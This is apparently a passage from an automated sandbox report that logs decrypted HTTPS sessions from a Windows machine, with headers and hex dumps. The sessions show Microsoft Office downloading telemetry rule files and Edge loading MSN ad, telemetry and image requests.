                                                                                                                                                                                                                                                                                                                    Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    89192.168.2.74986813.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 470
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080648Z-174f7845968l4kp6hC1EWRe8840000000x0g0000000008ws
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    90192.168.2.74987013.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 502
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 63854d8c-901e-007b-2581-3fac50000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080648Z-174f7845968jrjrxhC1EWRmmrs0000000wrg0000000086h4
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    91192.168.2.74986913.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:48 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:48 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 427
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 5810e7a8-301e-0000-3f91-3feecc000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080648Z-174f78459688l8rvhC1EWRtzr0000000094000000000cwxc
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    92192.168.2.74987113.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:49 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: 14d8e695-801e-008c-6b91-3f7130000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080649Z-174f78459685726chC1EWRsnbg0000000wt000000000282u
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                    93192.168.2.74987213.107.246.63443
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:50 GMT
                                                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                    Content-Length: 474
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                                                    ETag: "0x8DC582BB3F48DAE"
                                                                                                                                                                                                                                                                                                                    x-ms-request-id: a2105f9f-201e-00aa-1591-3f3928000000
                                                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                    x-azure-ref: 20241127T080650Z-174f7845968ljs8phC1EWRe6en0000000weg000000008fum
                                                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    94192.168.2.74987420.96.153.1114438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC1068OUTGET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=39EBC277A9596CA639AAD733A8706D90&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=-2063246587742936609&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=a8816b0182bf47eda22b4ccd7fd1d531 HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: arc.msn.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC674INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                    Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                    Content-Length: 297
                                                                                                                                                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                    Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                                                    ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}]
                                                                                                                                                                                                                                                                                                                    Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                    X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:49 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC297INData Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 38 38 30 30 30 33 30 38 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47 4e 5f 70 73 2c 20 45 72 72 6f 72 3a 20 4e 6f 20 65 6c 69 67 69 62 6c 65 20 63 6f 6e 74 65 6e 74 2e 29 2e 22 7d 5d 7d 2c 7b 22 70 6c 61 63 65 6d 65 6e 74 22 3a 22 31 30 38 33 37 33 39 33 22 2c 22 65 72 72 6f 72 73 22 3a 5b 7b 22 63 6f 64 65 22 3a 32 30 34 30 2c 22 6d 73 67 22 3a 22 44 65 6d 61 6e 64 20 73 6f 75 72 63 65 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 28 4e 61 6d 65 3a 20 47
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"batchrsp":{"ver":"1.0","errors":[{"placement":"88000308","errors":[{"code":2040,"msg":"Demand source returns error (Name: GN_ps, Error: No eligible content.)."}]},{"placement":"10837393","errors":[{"code":2040,"msg":"Demand source returns error (Name: G


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    95192.168.2.74987320.42.73.304438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC1082OUTPOST /OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732700967943&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    Content-Length: 3781
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                    Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                    Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                    Cookie: _C_ETH=1; USRLOC=; MUID=39EBC277A9596CA639AAD733A8706D90; _EDGE_S=F=1&SID=35E38335F0836A5611389671F1A26B28; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:49 UTC3781OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 50 61 67 65 56 69 65 77 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 37 54 30 39 3a 34 39 3a 32 37 2e 39 33 39 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 65 78 74 22 3a 7b 22 73 64 6b 22 3a 7b 22 76 65 72 22 3a 22 31 44 53 2d 57 65 62 2d 4a 53 2d 33 2e 32 2e 38 22 2c 22 73 65 71 22 3a 31 2c 22 69 6e 73 74 61 6c 6c 49 64 22 3a 22 34 35 65 65 61 32 35 37 2d 63 34 35 66 2d 34 35 62 38 2d 39 37 62 62 2d 64 33 32 36 64 36 39 39 39 37 37 32 22 2c 22 65 70 6f 63 68 22 3a 22 31 34 31 32 31 38 31 38 37 33 22 7d 2c 22 61 70 70 22 3a 7b 22 6c 6f 63 61 6c 65
                                                                                                                                                                                                                                                                                                                    Data Ascii: {"name":"MS.News.Web.PageView","time":"2024-11-27T09:49:27.939Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","ext":{"sdk":{"ver":"1DS-Web-JS-3.2.8","seq":1,"installId":"45eea257-c45f-45b8-97bb-d326d6999772","epoch":"1412181873"},"app":{"locale
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC894INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                    P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MC1=GUID=b626ac40cba1455e8f3f26076aa5def4&HASH=b626&LV=202411&V=4&LU=1732694810083; Domain=.microsoft.com; Expires=Thu, 27 Nov 2025 08:06:50 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    Set-Cookie: MS0=0ab0ecdbdf934d678794c24bf32abf0c; Domain=.microsoft.com; Expires=Wed, 27 Nov 2024 08:36:50 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                    time-delta-millis: -6157860
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                    Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                    Date: Wed, 27 Nov 2024 08:06:49 GMT
                                                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                    96192.168.2.749881104.117.182.594438168C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                    2024-11-27 08:06:50 UTC634OUTGET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1
                                                                                                                                                                                                                                                                                                                    Host: img-s-msn-com.akamaized.net
                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                    Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                                                    Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
